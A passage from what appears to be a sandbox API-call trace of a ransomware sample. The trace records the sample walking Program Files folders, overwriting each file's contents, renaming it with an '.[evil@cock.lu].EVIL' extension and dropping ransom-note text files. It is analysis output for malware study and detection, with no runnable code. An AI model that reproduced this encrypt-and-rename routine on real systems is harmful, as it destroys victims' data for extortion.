lpOverlapped=0x0) returned 1 [0090.285] CloseHandle (hObject=0x1a0) returned 1 [0090.285] _wfsopen (_FileName="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\install.ins", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.285] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0090.285] __uncaught_exception () returned 0x84b1160800 [0090.285] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.290] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\install.ins" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins"), lpNewFileName="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\install.ins.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\internet explorer\\signup\\install.ins.[evil@cock.lu].evil")) returned 1 [0090.291] ??_V@YAXPEAX@Z () returned 0x1 [0090.295] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\install.ins", dwFileAttributes=0x0) returned 0 [0090.295] FindNextFileW (in: hFindFile=0x84b11dd380, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0 [0090.295] FindClose (in: hFindFile=0x84b11dd380 | out: hFindFile=0x84b11dd380) returned 1 [0090.295] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\SIGNUP") returned 0x2a [0090.295] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.295] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.295] _wfsopen (_FileName="C:\\\\Program Files\\Internet Explorer\\SIGNUP\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.296] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.296] __uncaught_exception () returned 0x84b1160800 [0090.296] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.297] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.297] wcsstr (_Str="sqmapi.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.297] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Internet Explorer\\sqmapi.dll") returned 46 [0090.297] wcscmp (_String1="sqmapi.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.297] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sqmapi.dll") returned 0x0 [0090.297] wcslen (_String="C:\\\\Program Files\\Internet Explorer\\sqmapi.dll") returned 0x2e [0090.297] CreateFileW (lpFileName="C:\\\\Program Files\\Internet Explorer\\sqmapi.dll" (normalized: "c:\\program files\\internet explorer\\sqmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0090.297] GetLastError () returned 0x5 [0090.297] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0 [0090.297] FindClose (in: hFindFile=0x84b11cd150 | out: hFindFile=0x84b11cd150) returned 1 [0090.297] wcslen (_String="C:\\\\Program Files\\Internet Explorer") returned 0x23 [0090.297] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.297] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0090.297] _wfsopen (_FileName="C:\\\\Program Files\\Internet Explorer\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.298] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0090.298] __uncaught_exception () returned 0x84b1160800 [0090.298] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.299] FindNextFileW (in: hFindFile=0x84b11cd0f0, lpFindFileData=0x84b0fdee80 | out: lpFindFileData=0x84b0fdee80) returned 1 [0090.299] wcsstr (_Str="Java", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.299] _snwprintf (in: _Dest=0x84b0fdf0d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java") returned 22 [0090.299] wcscmp (_String1=".", _String2="Java") returned -1 [0090.299] wcscmp (_String1="..", _String2="Java") returned -1 [0090.299] wcslen (_String="C:\\\\Program Files\\Java") returned 0x16 [0090.299] wcscpy_s (in: _Destination=0x84b0fdebb0, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java" | out: _Destination="C:\\\\Program Files\\Java") returned 0x0 [0090.299] wcscat (in: _Dest=0x84b0fdebb0, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\*") returned="C:\\\\Program Files\\Java\\*" [0090.299] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\*", lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 0x84b11cd150 [0090.299] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.299] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\.") returned 24 [0090.299] wcscmp (_String1=".", _String2=".") returned 0 [0090.299] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.299] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.299] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\..") returned 25 [0090.299] wcscmp (_String1=".", _String2="..") returned -1 [0090.299] wcscmp (_String1="..", _String2="..") returned 0 [0090.299] FindNextFileW (in: hFindFile=0x84b11cd150, lpFindFileData=0x84b0fde960 | out: lpFindFileData=0x84b0fde960) returned 1 [0090.299] wcsstr (_Str="jre1.8.0_131", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.299] _snwprintf (in: _Dest=0x84b0fdebb0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131") returned 35 [0090.299] wcscmp (_String1=".", _String2="jre1.8.0_131") returned -1 [0090.299] wcscmp (_String1="..", _String2="jre1.8.0_131") returned -1 [0090.299] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131") returned 0x23 [0090.300] wcscpy_s (in: _Destination=0x84b0fde690, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131") returned 0x0 [0090.300] wcscat (in: _Dest=0x84b0fde690, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\*" [0090.300] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\*", lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 0x84b11ddce0 [0090.300] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.300] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\.") returned 37 [0090.300] wcscmp (_String1=".", _String2=".") returned 0 [0090.300] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.300] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.300] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\..") returned 38 [0090.300] wcscmp (_String1=".", _String2="..") returned -1 [0090.300] wcscmp (_String1="..", _String2="..") returned 0 [0090.300] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0090.300] wcsstr (_Str="bin", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.300] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin") returned 39 [0090.300] wcscmp (_String1=".", _String2="bin") returned -1 [0090.300] wcscmp (_String1="..", _String2="bin") returned -1 [0090.300] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin") returned 0x27 [0090.300] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin") returned 0x0 [0090.300] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\*" [0090.300] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd680 [0090.321] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.321] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\.") returned 41 [0090.321] wcscmp (_String1=".", _String2=".") returned 0 [0090.321] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.321] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.321] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\..") returned 42 [0090.321] wcscmp (_String1=".", _String2="..") returned -1 [0090.322] wcscmp (_String1="..", _String2="..") returned 0 [0090.322] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.322] wcsstr (_Str="awt.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.322] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\awt.dll") returned 47 [0090.322] wcscmp (_String1="awt.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.322] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="awt.dll") returned 0x0 [0090.322] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\awt.dll") returned 0x2f [0090.322] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\awt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0090.324] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x100000, lpOverlapped=0x0) returned 1 [0090.523] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.523] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.523] _errno () returned 0x84b1160840 [0090.525] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.525] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x100020, lpOverlapped=0x0) returned 1 [0090.575] CloseHandle (hObject=0x1a4) returned 1 [0090.575] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\awt.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.575] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0090.575] __uncaught_exception () returned 0x84b1160800 [0090.575] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.576] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\awt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\awt.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\awt.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\awt.dll.[evil@cock.lu].evil")) returned 1 [0090.576] ??_V@YAXPEAX@Z () returned 0x1 [0090.579] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\awt.dll", dwFileAttributes=0x0) returned 0 [0090.579] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.579] wcsstr (_Str="bci.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.579] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\bci.dll") returned 47 [0090.579] wcscmp (_String1="bci.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.579] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="bci.dll") returned 0x0 [0090.579] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\bci.dll") returned 0x2f [0090.579] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\bci.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0090.581] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4240, lpOverlapped=0x0) returned 1 [0090.656] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.656] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.656] _errno () returned 0x84b1160840 [0090.657] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.657] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x4260, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4260, lpOverlapped=0x0) returned 1 [0090.657] CloseHandle (hObject=0x1a4) returned 1 [0090.657] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\bci.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.657] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0090.657] __uncaught_exception () returned 0x84b1160800 [0090.657] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.658] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\bci.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\bci.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\bci.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\bci.dll.[evil@cock.lu].evil")) returned 1 [0090.658] ??_V@YAXPEAX@Z () returned 0x1 [0090.661] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\bci.dll", dwFileAttributes=0x0) returned 0 [0090.661] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.661] wcsstr (_Str="dcpr.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.661] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dcpr.dll") returned 48 [0090.661] wcscmp (_String1="dcpr.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.661] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="dcpr.dll") returned 0x0 [0090.661] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dcpr.dll") returned 0x30 [0090.661] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dcpr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0090.663] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x27040, lpOverlapped=0x0) returned 1 [0090.854] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.854] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.854] _errno () returned 0x84b1160840 [0090.854] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.854] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x27060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x27060, lpOverlapped=0x0) returned 1 [0090.855] CloseHandle (hObject=0x1a4) returned 1 [0090.855] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dcpr.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.855] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0090.855] __uncaught_exception () returned 0x84b1160800 [0090.855] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.855] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dcpr.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dcpr.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dcpr.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\dcpr.dll.[evil@cock.lu].evil")) returned 1 [0090.856] ??_V@YAXPEAX@Z () returned 0x1 [0090.859] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dcpr.dll", dwFileAttributes=0x0) returned 0 [0090.859] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.859] wcsstr (_Str="decora_sse.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.859] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\decora_sse.dll") returned 54 [0090.859] wcscmp (_String1="decora_sse.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.859] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="decora_sse.dll") returned 0x0 [0090.859] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\decora_sse.dll") returned 0x36 [0090.859] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\decora_sse.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0090.861] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x15040, lpOverlapped=0x0) returned 1 [0090.877] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.877] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.877] _errno () returned 0x84b1160840 [0090.877] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.877] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x15060, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x15060, lpOverlapped=0x0) returned 1 [0090.878] CloseHandle (hObject=0x1a4) returned 1 [0090.878] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\decora_sse.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.878] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0090.878] __uncaught_exception () returned 0x84b1160800 [0090.878] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.878] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\decora_sse.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\decora_sse.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\decora_sse.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\decora_sse.dll.[evil@cock.lu].evil")) returned 1 [0090.879] ??_V@YAXPEAX@Z () returned 0x1 [0090.881] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\decora_sse.dll", dwFileAttributes=0x0) returned 0 [0090.881] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.882] wcsstr (_Str="deploy.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.882] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\deploy.dll") returned 50 [0090.882] wcscmp (_String1="deploy.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0090.882] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="deploy.dll") returned 0x0 [0090.882] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\deploy.dll") returned 0x32 [0090.882] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\deploy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0090.883] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x8f440, lpOverlapped=0x0) returned 1 [0090.960] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.960] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0090.960] _errno () returned 0x84b1160840 [0090.960] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0090.960] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x8f460, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x8f460, lpOverlapped=0x0) returned 1 [0090.962] CloseHandle (hObject=0x1a4) returned 1 [0090.962] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\deploy.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0090.962] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0090.962] __uncaught_exception () returned 0x84b1160800 [0090.962] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0090.962] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\deploy.dll" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\deploy.dll"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\deploy.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\bin\\deploy.dll.[evil@cock.lu].evil")) returned 1 [0090.963] ??_V@YAXPEAX@Z () returned 0x1 [0090.965] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\deploy.dll", dwFileAttributes=0x0) returned 0 [0090.966] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0090.966] wcsstr (_Str="dtplugin", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.966] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin") returned 48 [0090.966] wcscmp (_String1=".", _String2="dtplugin") returned -1 [0090.966] wcscmp (_String1="..", _String2="dtplugin") returned -1 [0090.966] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin") returned 0x30 [0090.966] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin" | out: _Destination="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin") returned 0x0 [0090.966] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\*") returned="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\*" [0090.966] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dde60 [0090.966] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0090.966] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\bin\\dtplugin\\.") returned 50 [0090.966] wcscmp (_String1=".", _String2=".") returned 0 [0090.966] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: 